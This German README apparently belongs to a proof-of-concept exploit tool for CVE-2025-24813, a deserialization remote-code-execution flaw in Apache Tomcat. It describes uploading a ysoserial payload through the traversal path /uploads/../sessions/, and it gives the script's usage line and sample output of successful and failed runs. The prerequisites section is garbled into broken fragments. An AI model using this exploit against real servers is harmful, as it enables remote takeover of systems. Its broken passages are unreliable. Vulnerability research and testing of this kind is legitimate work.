
Dieses Repository enthält ein automatisiertes Proof-of-Concept-Skript (PoC) zur Ausnutzung von **CVE-2025-24813**, einer Remote-Code-Execution-Schwachstelle (RCE) in Apache Tomcat. Die Schwachstelle ermöglicht es einem Angreifer, eine schädliche serialisierte Nutzlast auf den Server hochzuladen, was bei Vorliegen bestimmter Bedingungen durch Deserialisierung zur Ausführung beliebigen Codes führt.
CVE-2025-24813 ist eine theoretische RCE-Sicherheitslücke in Apache Tomcat, die eine unsachgemäße Handhabung hochgeladener Sitzungsdateien und Deserialisierungsmechanismen ausnutzt. Durch das Hochladen einer manipulierten Nutzlast in ein beschreibbares Verzeichnis (z.B. /uploads/../sessions/) kann ein Angreifer eine Deserialisierung auslösen, was zur Ausführung beliebiger Befehle auf dem Zielserver führt.
Für die erfolgreiche Ausnutzung der Sicherheitslücke mit diesem PoC müssen folgende Bedingungen erfüllt sein:
/index.jsp) und die Deserialisierung der Nutzlast auslösen.ysoserial zu generieren oder Java-basierte Nutzlasten zu kompilieren.ysoserial-Nutzlasttyp verwendet wird, muss die ysoserial.jar-Datei lokal verfügbar sein.python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser